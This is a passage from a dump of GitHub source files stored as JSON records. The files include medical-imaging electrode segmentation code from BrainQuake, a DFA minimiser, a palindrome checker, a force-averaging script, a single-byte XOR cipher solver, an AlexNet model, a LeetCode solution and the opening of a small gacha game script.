self).__init__()\n\n def run(self): # erode, skull, intra_save\n mask_file = os.path.join(self.directory_surf, \"mri\", \"mask.mgz\")\n img_mask = nib.load(mask_file)\n data_mask = img_mask.get_fdata()\n data_mask_ero = ndimage.morphology.binary_erosion(data_mask, iterations=self.ero_itr)\n \n CTreg_file = os.path.join(self.directory_ct, f\"{self.patient}CT_Reg.nii.gz\")\n img_ct = nib.load(CTreg_file)\n data_ct = img_ct.get_fdata()\n maxVal = np.amax(data_ct)\n self.thre = self.thre / 100\n thre = maxVal * self.thre\n \n data_ct[data_mask_ero == 0] = 0\n img1 = nib.Nifti1Image(data_ct, img_ct.affine)\n intra_file1 = os.path.join(self.directory_ct, f\"{self.patient}CT_intra.nii.gz\")\n nib.save(img1, intra_file1)\n \n data_ct[data_ct < thre] = 0\n\n img0 = nib.Nifti1Image(data_ct, img_ct.affine)\n intra_file = os.path.join(self.directory_ct, f\"{self.patient}CT_intracranial_{self.thre}_{self.K}_{self.ero_itr}.nii.gz\")\n nib.save(img0, intra_file)\n self.finished.emit()\n\nclass PreprocessResult_thread(QThread):\n\n send_axes = pyqtSignal(ndarray)\n\n def __init__(self):\n super(PreprocessResult_thread, self).__init__()\n\n def run(self):\n intra_file = self.CTintra_file\n xs, ys, zs = dataExtraction(intraFile=intra_file, thre=self.thre)\n pointsArray = np.transpose(np.vstack((xs, ys, zs)))\n 
self.send_axes.emit(pointsArray)\n\nclass GenerateLabel_thread(QThread):\n\n finished = pyqtSignal(int)\n\n def __init__(self):\n super(GenerateLabel_thread, self).__init__()\n\n def run(self):\n # process 3d line hough transform\n # hough_file = f\"{self.directory_ct}{self.patient}.txt\"\n hough_file = os.path.join(self.directory_ct, f\"{self.patient}.txt\")\n if not os.path.exists(hough_file):\n xs, ys, zs = trackRecognition(patient=self.patient, cmd_hough3d=CMD_Hough3D, CTresult_dir=self.directory_ct, intraFile=self.intra_file, thre=0)\n else: # temporarily\n # xs, ys, zs = utils.trackRecognition(patient=patient, cmd_hough3d=CMD_Hough3D, CTresult_dir=CTresult_dir, intraFile=intra_file, thre=Thre)\n xs, ys, zs = dataExtraction(intraFile=self.intra_file, thre=0)\n pass\n \n # read detected lines' info\n elec_track = []\n with open(hough_file, 'r') as f:\n for line in f.readlines():\n a = re.findall(r\"\\d+\\.?\\d*\", line)\n for i in range(len(a)):\n a[i] = float(a[i])\n elec_track.append(a)\n # print(f\"{len(elec_track)} tracks has been detected!\\n\")\n # print(elec_track)\n elec_track = np.array(elec_track)\n K_check = elec_track.shape[0]\n if K_check < self.K:\n self.finished.emit(1)\n else: # if K_check != K:\n print(f\"Warning: {self.K} electrodes implanted, but {K_check} has been clustered by Hough!\")\n # sys.exit()\n \n # process a gaussian mixture model for bug fixing\n centroids = np.array(elec_track[0:self.K, 1:4])\n # print(centroids)\n X = np.transpose(np.vstack((xs, ys, zs)))\n gmm = GMM(n_components=self.K, covariance_type='full',means_init=centroids, random_state=None).fit(X)\n labels = gmm.predict(X)\n # print(labels)\n \n Labels = np.zeros((256, 256, 256)) # labeled space\n for i in range(self.K):\n ind = np.where(labels == i)\n Labels[xs[ind], ys[ind], zs[ind]] = i + 1\n np.save(os.path.join(self.directory_ct, f\"{self.patient}_labels.npy\"), Labels, allow_pickle=True, fix_imports=True)\n self.finished.emit(0)\n\n# class LabelResult_thread(QThread):\n# def __init__(self):\n# super(LabelResult_thread, self).__init__()\n\n# def run(self):\n# print('Yaah!')\n\nclass ContactSegment_thread(QThread):\n\n finished = pyqtSignal()\n\n def __init__(self):\n super(ContactSegment_thread, self).__init__()\n\n def run(self):\n print('Yaah!')\n for i in range(self.K):\n iLabel = i + 1\n # xxx = electrode.ElectrodeSeg(filePath=self.directory_labels, patName=self.patName, iLabel=iLabel, numMax=self.numMax, diameterSize=self.diameterSize, spacing=self.spacing, gap=self.gap)\n xxx = ElectrodeSeg(filePath=self.directory_labels, patName=self.patName, iLabel=iLabel, numMax=self.numMax, diameterSize=self.diameterSize, spacing=self.spacing, gap=self.gap)\n xxx.pipeline()\n print(xxx.elecPos)\n self.finished.emit()\n\ndef savenpy(filePath, patientName):\n # dir = f\"{filePath}/{patientName}_result\"\n dir = os.path.join(filePath, f\"{patientName}_result\")\n # dir1 = f\"{filePath}/{patientName}_data\"\n elec_dict = {}\n for root, dirs, files in os.walk(dir, topdown=True):\n # print('files:', files)\n if '.DS_Store' in files:\n files.remove('.DS_Store')\n if 'chnXyzDict.npy' in files:\n files.remove('chnXyzDict.npy')\n for file in files:\n elec_name = file.split('.')[0]\n elec_info = np.loadtxt(os.path.join(root, file))\n \n elec_info = elec_info # [1:, :] # [:,np.array([2,1,0])]\n elec_dict[elec_name] = elec_info\n \n # np.save(f\"{filePath}/chnXyzDict.npy\", elec_dict)\n np.save(os.path.join(filePath, f\"chnXyzDict.npy\"), elec_dict)\n\ndef lookupTable(subdir, patient, ctdir, elec_label):\n # 
annot_dir = f\"{subdir}/mri/aparc.a2009s+aseg.mgz\"\n annot_dir = os.path.join(subdir, 'mri', 'aparc.a2009s+aseg.mgz')\n lookup_table = f\"FreeSurferColorLUT.txt\"\n annot_img = nib.load(annot_dir).get_fdata()\n \n # elecs_file = f\"{ctdir}/{patient}_result/{elec_label}.txt\"\n elecs_file = os.path.join(ctdir, f\"{patient}_result/{elec_label}.txt\")\n elecs_xyz = np.loadtxt(elecs_file, dtype='float', comments='#')\n elecs_xyz = elecs_xyz[:, [0, 2, 1]]\n elecs_xyz[:, 0] = 128 - elecs_xyz[:, 0]\n elecs_xyz[:, 1] = 128 - elecs_xyz[:, 1]\n elecs_xyz[:, 2] = 128 + elecs_xyz[:, 2] \n \n labels = []\n for row in range(elecs_xyz.shape[0]):\n x = elecs_xyz[row, 0]\n y = elecs_xyz[row, 1]\n z = elecs_xyz[row, 2]\n x1 = int(x)\n x2 = math.ceil(x)\n y1 = int(y)\n y2 = math.ceil(y)\n z1 = int(z)\n z2 = math.ceil(z)\n val = [0]\n val.append(annot_img[x1, y1, z1])\n val.append(annot_img[x1, y1, z2])\n val.append(annot_img[x1, y2, z1])\n val.append(annot_img[x1, y2, z2])\n val.append(annot_img[x2, y1, z1])\n val.append(annot_img[x2, y1, z2])\n val.append(annot_img[x2, y2, z1])\n val.append(annot_img[x2, y2, z2])\n val = val[1:]\n labels.append(max(set(val), key = val.count))\n \n # print(labels)\n labels_name = []\n for label in labels:\n with open(lookup_table, 'r') as f:\n lines = f.readlines()\n rows = len(lines)\n for row in range(rows):\n line = lines[row][0: 8]\n b = str(int(label))\n if re.match(b, line):\n # print(lines[row])\n a = lines[row][len(b): -16].strip()\n labels_name.append(a)\n break\n return labels_name\n\n\nclass ElectrodeSeg:\n def __init__(self, filePath, patName, iLabel, numMax, diameterSize, spacing, gap):\n super(ElectrodeSeg, self).__init__()\n # set up input initials\n self.filePath = filePath\n self.patientName = patName\n \n raw_flag = 0 # check for the filepath existance\n for root, dirs, files in os.walk(self.filePath):\n for filename in files:\n if re.search(r'CT_intra.nii.gz', filename):\n raw_flag = 1\n # self.rawDataPath = f\"{self.filePath}/{filename}\"\n self.rawDataPath = os.path.join(self.filePath, filename)\n break\n if not raw_flag:\n sys.exit()\n\n label_flag = 0\n for root, dirs, files in os.walk(self.filePath):\n for filename in files:\n if re.search(r'_labels.npy', filename):\n label_flag = 1\n # self.labelsPath = f\"{self.filePath}/{filename}\"\n self.labelsPath = os.path.join(self.filePath, filename)\n break\n if not label_flag:\n sys.exit()\n \n self.rawData = nib.load(self.rawDataPath).get_fdata()\n self.labels = np.load(self.labelsPath)\n self.iLabel = iLabel\n self.numMax = numMax\n self.diameterSize = diameterSize\n self.spacing = spacing\n self.gap = gap\n\n self.affine = nib.load(self.rawDataPath).affine\n self.inv_vox2ras_tkr = np.array([[-1, 0, 0, 128], [0, 0, -1, 128], [0, 1, 0, 128], [0, 0, 0, 1]], dtype=np.float32)\n\n # some calculations to get the rest initials\n self.labelValues = np.unique(self.labels)\n self.numElecs = len(self.labelValues) - 1\n if self.numElecs > 8: # remove 'I' from the alphabet list, a trivial custom not to name the electrode 'I'\n self.alphaList = [chr(i) for i in range(65, 66+self.numElecs)]\n self.alphaList.pop(8)\n else:\n self.alphaList = [chr(i) for i in range(65, 65+self.numElecs)]\n print(self.iLabel)\n self.iValue = self.labelValues[self.iLabel]\n print(self.iValue)\n self.nameLabel = self.alphaList[self.iLabel-1]\n print(self.nameLabel)\n data_elec = np.copy(self.labels)\n data_elec[np.where(self.labels != self.iValue)] = 0 ## isolate a single cluster of voxels belonging to the ith electrode\n self.xs, self.ys, 
self.zs = np.where(data_elec != 0) \n self.pos_elec = np.transpose(np.vstack((self.xs, self.ys, self.zs))) ## positions of these voxels\n ### test!\n data_elec1 = np.copy(self.labels)\n data_elec1[np.where(self.labels == self.iValue)] = 0\n self.xrest, self.yrest, self.zrest = np.where(data_elec1 != 0)\n self.rawData[self.xrest, self.yrest, self.zrest] = 0\n ### test!\n self.rawData_single = self.rawData\n xmin = np.amin(self.xs)\n xmax = np.amax(self.xs)\n ymin = np.amin(self.ys)\n ymax = np.amax(self.ys)\n zmin = np.amin(self.zs)\n zmax = np.amax(self.zs)\n # self.rawData_single[self.xs, self.ys, self.zs] = self.rawData_single[self.xs, self.ys, self.zs] * 3\n self.rawData_single[xmin:xmax+1, ymin:ymax+1, zmin:zmax+1] = self.rawData_single[xmin:xmax+1, ymin:ymax+1, zmin:zmax+1] * 3\n\n # self.resultPath = f\"{self.filePath}/{self.patientName}_result\"\n self.resultPath = os.path.join(self.filePath, f\"{self.patientName}_result\")\n if not os.path.exists(self.resultPath):\n os.mkdir(self.resultPath)\n # self.resultFile = f\"{self.resultPath}/{self.nameLabel}.txt\"\n self.resultFile = os.path.join(self.resultPath, f\"{self.nameLabel}.txt\")\n self.elecPos = [0, 0, 0]\n self.headStart = [0, 0, 0]\n self.targetPoint = [0, 0, 0]\n self.regressInfo = [0, 0, 0, 0]\n \n def pipeline(self):\n self.startPoint()\n self.contactPoint(1)\n self.regression()\n for j in np.arange(self.numMax - 1):\n # if self.rawData[int(round(self.elecPos[-1,0])), int(round(self.elecPos[-1,1])), int(round(self.elecPos[-1,2]))] == 0:\n # self.elecPos = self.elecPos[0:-1, :]\n # break\n if int(self.elecPos[-1,0])==int(self.elecPos[-2,0]) and int(self.elecPos[-1,1])==int(self.elecPos[-2,1]) and int(self.elecPos[-1,2])==int(self.elecPos[-2,2]):\n self.elecPos = self.elecPos[0:-1, :]\n break\n self.step()\n if self.flag_step_stop:\n break\n self.elecPos = self.elecPos[1:, :]\n # print(self.elecPos)\n self.resulting()\n # return self.elecPos\n \n def resulting(self):\n self.elecPos_true = np.copy(self.elecPos)\n self.elecPos_true[:, 0] = 128 - self.elecPos[:, 0]\n self.elecPos_true[:, 1] = 128 - self.elecPos[:, 1]\n self.elecPos_true[:, 2] = self.elecPos[:, 2] - 128\n self.elecPos_true = self.elecPos_true[:, [0, 2, 1]]\n \n self.elecFilepath = os.path.join(self.filePath, f\"{self.patientName}_result\")\n if not os.path.exists(self.elecFilepath):\n os.mkdir(self.elecFilepath)\n \n self.elecFile = os.path.join(self.elecFilepath, f\"{self.nameLabel}.txt\")\n with open(self.elecFile, \"ab\") as f:\n f.seek(0)\n f.truncate()\n # f.write(b\"\\n\")\n np.savetxt(f, self.elecPos_true, fmt='%10.8f', delimiter=' ', newline='\\n', header=f\"{self.elecPos_true.shape[0]}\")\n \n # calculate freeview-version results\n tmp = np.matmul(self.affine, self.inv_vox2ras_tkr)\n tmp1 = np.matmul(tmp, np.transpose(np.column_stack((self.elecPos_true, np.ones((self.elecPos_true.shape[0], ))))))\n self.elecPos_freeview = np.transpose(tmp1)[:, 0:3]\n\n self.elecFilepath_freeview = os.path.join(self.filePath, f\"{self.patientName}_freeview_result\")\n if not os.path.exists(self.elecFilepath_freeview):\n os.mkdir(self.elecFilepath_freeview)\n \n self.elecFile_freeview = os.path.join(self.elecFilepath_freeview, f\"{self.nameLabel}.txt\")\n with open(self.elecFile_freeview, \"ab\") as f:\n f.seek(0)\n f.truncate()\n # f.write(b\"\\n\")\n np.savetxt(f, self.elecPos_freeview, fmt='%10.8f', delimiter=' ', newline='\\n', header=f\"{self.elecPos_freeview.shape[0]}\")\n \n \n\n ## target point functions\n def startPoint(self):\n ## firstly find a voxel near the 
target\n x = [np.max(self.xs), np.min(self.xs)]\n y = [np.max(self.ys), np.min(self.ys)]\n z = [np.max(self.zs), np.min(self.zs)]\n self.reg1 = LinearRegression().fit(X=self.xs.reshape(-1,1), y=self.ys) # x-y\n self.reg2 = LinearRegression().fit(X=self.xs.reshape(-1,1), y=self.zs) # x-z\n self.reg3 = LinearRegression().fit(X=self.ys.reshape(-1,1), y=self.zs) # y-z\n\n coefs = [abs(self.reg1.coef_), abs(self.reg2.coef_), abs(self.reg3.coef_)]\n coef_min = coefs.index(min(coefs))\n if coef_min == 0:\n index = [0 if self.reg2.coef_>0 else 1, 0 if self.reg3.coef_>0 else 1, 0]\n elif coef_min == 1:\n index = [0 if self.reg1.coef_>0 else 1, 0, 0 if self.reg3.coef_>0 else 1]\n else:\n index = [0, 0 if self.reg1.coef_>0 else 1, 0 if self.reg2.coef_>0 else 1]\n indexreverse = [~index[0], ~index[1], ~index[2]]\n\n point1 = np.array([x[index[0]], y[index[1]], z[index[2]]])\n point2 = np.array([x[indexreverse[0]], y[indexreverse[1]], z[indexreverse[2]]])\n center = 127.5 * np.ones(3)\n diff1 = point1 - center\n diff2 = point2 - center\n headStart = point2 if np.sum(np.transpose(diff1)*diff1) > np.sum(np.transpose(diff2)*diff2) else point1\n self.direction = indexreverse if np.sum(np.transpose(diff1)*diff1) > np.sum(np.transpose(diff2)*diff2) else index\n\n ## secondly specify a target voxel in label voxels\n diffs = self.pos_elec - headStart\n diffs2 = np.power(diffs[:,0], 2) + np.power(diffs[:,1], 2) + np.power(diffs[:,2], 2)\n headPointPos = np.argmin(diffs2)\n self.headStart = self.pos_elec[headPointPos, :]\n \n def converge(self, x, y, z):\n ## converge to the mass center of a cluster of voxels\n n = self.diameterSize\n delta = math.ceil(round((n - 1) / 2, 1)) # represent the radius of the electrode contact\n ## extract a cubic ROI of the raw CT data\n seq_s = np.arange(x - delta, x + delta + 1)\n seq_r = np.arange(y - delta, y + delta + 1)\n seq_c = np.arange(z - delta, z + delta + 1)\n\n if not ((np.array(seq_s) > 0).all() and (np.array(seq_r) > 0).all() and (np.array(seq_c) > 0).all()):\n print('Error: index too small 0!')\n return 0, 0, 0\n elif not ((np.array(seq_s) < 256).all() and (np.array(seq_r) < 256).all() and (np.array(seq_c) < 256).all()):\n print('Error: index too large 256!')\n return 0, 0, 0\n \n else:\n ## extract the ROI cubic\n # test!!!\n matrixVoxels = self.rawData_local[seq_s[0]:seq_s[-1]+1, seq_r[0]:seq_r[-1]+1, seq_c[0]:seq_c[-1]+1]\n sumVoxels = np.sum(matrixVoxels)\n\n if (np.sum(matrixVoxels)== 0):\n print('Error: Converge to non-elec region!')\n return 0, 0, 0\n else:\n f = np.zeros((1, 4))\n for index, element in np.ndenumerate(matrixVoxels):\n x, y, z = index\n tmp = np.array([x+seq_s[0], y+seq_r[0], z+seq_c[0], element])\n f = np.vstack((f, tmp))\n f = f[1:]\n CM = np.average(f[:,:3], axis=0, weights=f[:,3])\n C100 = CM[0]\n C010 = CM[1]\n C001 = CM[2]\n \n x1 = C100\n y1 = C010\n z1 = C001\n return x1, y1, z1\n \n def contactPoint(self, target):\n ## converge to an electrode contact position\n x0 = self.headStart[0] if target == 1 else self.x0\n y0 = self.headStart[1] if target == 1 else self.y0\n z0 = self.headStart[2] if target == 1 else self.z0\n \n x = int(round(x0))\n y = int(round(y0))\n z = int(round(z0))\n print(f\"initial start voxel:({x0}, {y0}, {z0})\")\n \n # test!!!\n self.rawData_local = self.rawData_single\n diff_array = self.pos_elec - np.array([x0, y0, z0])\n elec_diffs = np.sqrt(np.dot(diff_array, np.transpose(diff_array)).diagonal())\n ind_diffs = np.where(elec_diffs <= 2)\n self.rawData_local[self.xs[ind_diffs], self.ys[ind_diffs], 
self.zs[ind_diffs]] = self.rawData_local[self.xs[ind_diffs], self.ys[ind_diffs], self.zs[ind_diffs]] * 2\n (x1, y1, z1) = self.converge(x, y, z)\n itr = 1\n flag_convergence = 0\n while not ((x==int(round(x1))) and (y==int(round(y1))) and (z==int(round(z1)))):\n x = int(round(x1))\n y = int(round(y1))\n z = int(round(z1))\n (x1, y1, z1) = self.converge(x, y, z)\n itr = itr + 1\n if itr > 5:\n flag_convergence = 1\n break\n \n print(f\"Convergent center voxel coordinates:({x1},{y1},{z1})\")\n print(f\"Convergent center voxel value:{self.rawData[int(round(x1)), int(round(y1)), int(round(z1))]}\")\n \n self.flag_step_stop = 0\n if (x1, y1, z1) == (0, 0, 0):\n self.flag_step_stop = 1\n print('here1,converged to 0!')\n # self.elecPos = np.vstack([self.elecPos, [x1, y1, z1]])\n \n else:\n if not flag_convergence:\n print('here2,converged normally!') \n self.targetPoint = [x1, y1, z1] if target == 1 else self.targetPoint\n self.elecPos = np.vstack([self.elecPos, [x1, y1, z1]])\n else:\n print('here3, maybe not convergent!') \n self.targetPoint = [x1, y1, z1] if target == 1 else self.targetPoint\n self.elecPos = np.vstack([self.elecPos, [x1, y1, z1]])\n\n def regression(self):\n ## regress an electrode and find the axis direction\n X = np.transpose(np.vstack((self.xs, self.ys)))\n y = self.zs\n \n forcedX = np.transpose(np.array([self.targetPoint[0], self.targetPoint[1]]))\n forcedy = self.targetPoint[2]\n \n ## implant a contraint regression, forcing on the head point\n X = X - forcedX\n y = y - forcedy\n reg = Lasso(fit_intercept=False).fit(X=X, y=y)\n reg.intercept_ = reg.intercept_ + forcedy - np.dot(forcedX, reg.coef_)\n ## regression between x and y\n reg2 = LinearRegression(fit_intercept=True).fit(X=self.xs.reshape(-1,1), y=self.ys)\n \n self.coef = reg.coef_\n self.intercept = reg.intercept_\n self.coef2 = reg2.coef_\n self.intercept2 = reg2.intercept_\n \n def step(self):\n ## step out along the electrode axis\n dis = self.spacing # initial step size\n\n # delta_x = np.sqrt(np.power(dis, 2) / (1 + np.power(self.coef2[0],2) + np.power(np.dot(self.coef, np.array([1, self.coef2[0]])) ,2)))\n # delta_y = np.dot(self.coef2[0], delta_x)\n # delta_z = np.dot(self.coef, np.array([1, self.coef2[0]])) * delta_x\n \n diff_x = np.max(self.xs) - np.min(self.xs)\n diff_y = np.max(self.ys) - np.min(self.ys)\n diff_z = np.max(self.zs) - np.min(self.zs)\n a = np.power(diff_x,2) + np.power(diff_y,2) + np.power(diff_z,2)\n delta_x = diff_x * np.sqrt(np.power(dis,2) / a)\n delta_y = diff_y * np.sqrt(np.power(dis,2) / a)\n delta_z = diff_z * np.sqrt(np.power(dis,2) / a)\n\n # delta_x = self.reg2.coef_ * np.sqrt(np.power(dis,2) / (1 + np.power(self.reg2.coef_,2) + np.power(self.reg3.coef_,2)))\n # delta_y = self.reg3.coef_ * np.sqrt(np.power(dis,2) / (1 + np.power(self.reg2.coef_,2) + np.power(self.reg3.coef_,2)))\n # delta_z = np.sqrt(np.power(dis,2) / (1 + np.power(self.reg2.coef_,2) + np.power(self.reg3.coef_,2)))\n\n self.x0 = np.int(self.elecPos[-1,0] - np.round(delta_x)) if ((self.direction[0]==-2) or (self.direction[0]==0)) else np.int(self.elecPos[-1,0] + np.round(delta_x))\n self.y0 = np.int(self.elecPos[-1,1] - np.round(delta_y)) if ((self.direction[1]==-2) or (self.direction[1]==0)) else np.int(self.elecPos[-1,1] + np.round(delta_y))\n self.z0 = np.int(self.elecPos[-1,2] - np.round(delta_z)) if ((self.direction[2]==-2) or (self.direction[2]==0)) else np.int(self.elecPos[-1,2] + np.round(delta_z))\n \n 
self.contactPoint(0)\n","repo_name":"HongLabTHU/BrainQuake","sub_path":"BrainQuake/utils/elec_utils.py","file_name":"elec_utils.py","file_ext":"py","file_size_in_byte":28259,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"61"} +{"seq_id":"71119239236","text":"def minimize_dfa(dfa):\n num_states = len(dfa[\"states\"])\n distinguishability = [[False] * num_states for _ in range(num_states)]\n\n for i in range(num_states):\n for j in range(i + 1, num_states):\n if (\n dfa[\"states\"][i] in dfa[\"accept_states\"]\n and dfa[\"states\"][j] not in dfa[\"accept_states\"]\n ) or (\n dfa[\"states\"][j] in dfa[\"accept_states\"]\n and dfa[\"states\"][i] not in dfa[\"accept_states\"]\n ):\n distinguishability[i][j] = True\n while True:\n change = False\n for i in range(num_states):\n for j in range(i + 1, num_states):\n if not distinguishability[i][j]:\n for symbol in dfa[\"alphabet\"]:\n index_i = dfa[\"states\"].index(\n dfa[\"transition\"][(dfa[\"states\"][i], symbol)]\n )\n index_j = dfa[\"states\"].index(\n dfa[\"transition\"][(dfa[\"states\"][j], symbol)]\n )\n if distinguishability[index_i][index_j]:\n distinguishability[i][j] = True\n change = True\n elif distinguishability[index_j][index_i]:\n distinguishability[i][j] = True\n change = True\n\n if not change:\n break\n equivalent_groups = {}\n for i in range(num_states):\n equivalent_groups[i] = set()\n for j in range(i, num_states):\n if not distinguishability[i][j]:\n equivalent_groups[i].add(dfa[\"states\"][j])\n min_dfa = {\n \"states\": [],\n \"alphabet\": dfa[\"alphabet\"],\n \"transition\": {},\n \"start_state\": None,\n \"accept_states\": set(),\n }\n\n for group in equivalent_groups.values():\n if dfa[\"start_state\"] in group:\n min_dfa[\"start_state\"] = list(group)[0]\n if any(state in dfa[\"accept_states\"] for state in group):\n min_dfa[\"accept_states\"].update(group)\n min_dfa[\"states\"].append(list(group)[0])\n\n for state in min_dfa[\"states\"]:\n for symbol in dfa[\"alphabet\"]:\n next_state = dfa[\"transition\"].get((state, symbol), None)\n if next_state is not None:\n min_dfa[\"transition\"][(state, symbol)] = [\n s\n for s in min_dfa[\"states\"]\n if next_state in equivalent_groups[dfa[\"states\"].index(s)]\n ][0]\n\n return min_dfa\ndfa = {\n \"states\": [\"q0\", \"q1\", \"q2\"],\n \"alphabet\": {\"0\", \"1\"},\n \"transition\": {\n (\"q0\", \"0\"): \"q1\",\n (\"q0\", \"1\"): \"q2\",\n (\"q1\", \"0\"): \"q0\",\n (\"q1\", \"1\"): \"q2\",\n (\"q2\", \"0\"): \"q2\",\n (\"q2\", \"1\"): \"q2\",\n },\n \"start_state\": \"q0\",\n \"accept_states\": [\"q0\"],\n}\n\nminimized_dfa = minimize_dfa(dfa)\n\nprint(\"Minimized DFA States:\", minimized_dfa[\"states\"])\nprint(\"Minimized DFA Alphabet:\", minimized_dfa[\"alphabet\"])\nprint(\"Minimized DFA Transition Function:\", minimized_dfa[\"transition\"])\nprint(\"Minimized DFA Start State:\", minimized_dfa[\"start_state\"])\nprint(\"Minimized DFA Accept States:\", minimized_dfa[\"accept_states\"])\n","repo_name":"TartejBrothers/App-Codes","sub_path":"Week13/q6.py","file_name":"q6.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32198927617","text":"\ndef check_palindrome(string):\n # getting the string length and initialising the splitting indices\n length = len(string)\n mid = length // 2\n delim = mid\n\n # checking whether the string has an odd length\n if length % 2 != 0: delim += 1\n\n # splitting the string\n first = string[:mid]\n 
second = string[delim:]\n\n # getting last value of second string\n last = len(second) - 1\n\n # traversing first from L -> R and second from R -> L\n for x in range(len(first)):\n # return false on any mismatched character\n if first[x] != second[last]: return False\n # decrease the iterator for second by 1\n last -=1\n return True\n","repo_name":"Meg2tron/python-1","sub_path":"code/palindrome_checker/palindrome_checker.py","file_name":"palindrome_checker.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24551203819","text":"import re\nimport sys\n\nDEFAULT_FILE_PATH = './runtime/postProcessing/forces/0/forces.dat'\n\ndef get_default_path():\n return DEFAULT_FILE_PATH\n\ndef run(start_step = 0, end_step = 1000, file_path=DEFAULT_FILE_PATH):\n data = [[], [], []]\n with open(file_path) as file:\n for line in file.readlines():\n # ignore comments\n if line[0] == '#':\n continue\n # split line into components, ignoring white space and parentheses\n components = tuple(filter(lambda x: x != '', re.split(\"[ \\t\\n()]\", line)))\n # check if time step is within range\n time_step = int(components[0])\n if time_step < start_step or time_step > end_step:\n continue\n # add to running average\n for i in range(len(data)):\n data[i].append(float(components[i+1]))\n average = [0] * len(data)\n stdev = [0] * len(data)\n\n for i in range(len(data)):\n average[i] = sum(data[i]) / len(data[i])\n\n for i in range(len(data)):\n for point in data[i]:\n stdev[i] += (point - average[i])**2\n stdev[i] = (stdev[i] / len(data[i]))**0.5\n\n return (average, stdev)\n\nif __name__ == '__main__':\n try:\n start_step = int(sys.argv[1])\n end_step = int(sys.argv[2])\n assert start_step >= 0\n assert end_step > start_step\n except:\n start_step = 0\n end_step = 1000\n print(\"Missing or invalid time step range, using defaults of %s to %s.\" % (start_step, end_step))\n\n if len(sys.argv) > 3:\n file_path = sys.argv[3]\n else:\n file_path = DEFAULT_FILE_PATH\n\n average, stdev = run(start_step, end_step, file_path)\n print('Average: ', average)\n print('Stdev: ', stdev)","repo_name":"RLin8910/Charger-NASCAR-Aero","sub_path":"running_average.py","file_name":"running_average.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11569487154","text":"# Single byte XOR cipher.\n# https://en.wikipedia.org/wiki/Etaoin_shrdlu\n\nimport binascii\nimport collections\n\n\ndef probability_of_being_legit_string(string):\n # According to the English letter frequency table,\n # \"etaoin shrdlu\" are the most frequent English\n # letters in words - from higher to lower frequency of occurrence\n\n return string.count(' ') + string.count('e') + string.count('t') + string.count('a') + string.count(\n 'o') + string.count('i') + string.count('n')\n\n # Including all of \"etaoin shrdlu\" will maximize \n # the given function, and hence also the accuracy of the prediction.\n #Though, I have included only etaoin, and it's giving me accurate results all the time\n\n\n \n \n'''We are given a hex encoded text; first we unhexlify it. Since the encryption is performed by xoring each byte \nwith one of the ascii characters i.e. ranging from 0-255, we re-xor it to get the message back. Doing so, we will get\na big list, i.e. a list of candidate strings (big_list in our case below). 
Now, we will pass each candidate to the function \nprobability_of_being_legit_string, and it will return our legit string. Voila! You cracked it.'''\n\n\ndef __single_char_XOR_cypher(encoded):\n # Given hex text\n nums = binascii.unhexlify(encoded)\n big_list = []\n for key in range(256):\n arr = ''\n for num in nums:\n arr = arr + chr(num ^ key)\n big_list.append(arr)\n return max(big_list, key=probability_of_being_legit_string)\n","repo_name":"dulalsaurab/cryptography","sub_path":"single_char_xor.py","file_name":"single_char_xor.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29206985937","text":"from torch import nn\n\n\nclass AlexNet(nn.Module):\n def __init__(self, args):\n super().__init__()\n self.args = args\n assert args.img_size == 227\n layers = [\n nn.Conv2d(args.img_dim, 96, 11, 4), # 96x55x55\n nn.ReLU(),\n nn.MaxPool2d(3, 2), # 96x27x27\n nn.Conv2d(96, 256, 5, 1, 2), # 256x27x27\n nn.ReLU(),\n nn.MaxPool2d(3, 2), # 256x13x13\n nn.Conv2d(256, 384, 3, 1, 1), # 384x13x13\n nn.ReLU(),\n nn.Conv2d(384, 384, 3, 1, 1), # 384x13x13\n nn.ReLU(),\n nn.Conv2d(384, 256, 3, 1, 1), # 256x13x13\n nn.ReLU(),\n nn.MaxPool2d(3, 2) # 256x6x6\n ]\n self.conv = nn.Sequential(*layers)\n layers = [\n nn.Linear(256 * 6 * 6, 4096),\n nn.ReLU(),\n nn.Linear(4096, 4096),\n nn.ReLU(),\n nn.Linear(4096, args.num_classes)\n ]\n self.fc = nn.Sequential(*layers)\n\n def forward(self, x):\n h = self.conv(x)\n y = self.fc(h.view(x.shape[0], -1))\n return y\n","repo_name":"songquanpeng/pytorch-classifiers","sub_path":"models/AlexNet.py","file_name":"AlexNet.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"4232826822","text":"# Time complexity: O(N^2), space complexity: O(1)\r\nclass Solution:\r\n def removeElement(self, nums, val: int) -> int:\r\n i = 0\r\n while i < len(nums):\r\n if (nums[i] == val):\r\n nums.pop(i)\r\n else:\r\n i += 1\r\n return len(nums)\r\n\r\n# Time complexity: O(N), space complexity: O(1)\r\n\r\nclass Solution2:\r\n def removeElement(self, nums, val: int) -> int:\r\n idx = 0\r\n while idx < len(nums):\r\n if nums[idx] == val:\r\n nums[idx] = nums[-1]\r\n del nums[-1]\r\n else:\r\n idx += 1\r\n return len(nums)\r\n\r\nif __name__ == "__main__":\r\n nums = [3, 2, 2, 3]\r\n val = 3\r\n s = Solution().removeElement(nums, val)\r\n print(s)\r\n","repo_name":"HuichuanLI/leetcode","sub_path":"leetcode/0027-Remove-Element/leetcode27.py","file_name":"leetcode27.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"43063329337","text":"import random\r\nimport time\r\nimport Gacha_List\r\nimport Trivia\r\nimport Fun_Fact\r\n\r\n## Abbreviation:\r\n## Len = Length\r\n## Ques = Question\r\n## Ans = Answer\r\n\r\nApp = True\r\n\r\n## Stuff/List for Gacha\r\n\r\nGacha_Country_List = ['Germany', 'USSR', 'USA']\r\nGacha_Tier_List = ['Ultra Rare', 'Rare', 'Uncommon']\r\nGacha_Country_Len = len(Gacha_Country_List)\r\n\r\n### Germany\r\n\r\nGermany_Len_Uncommon = 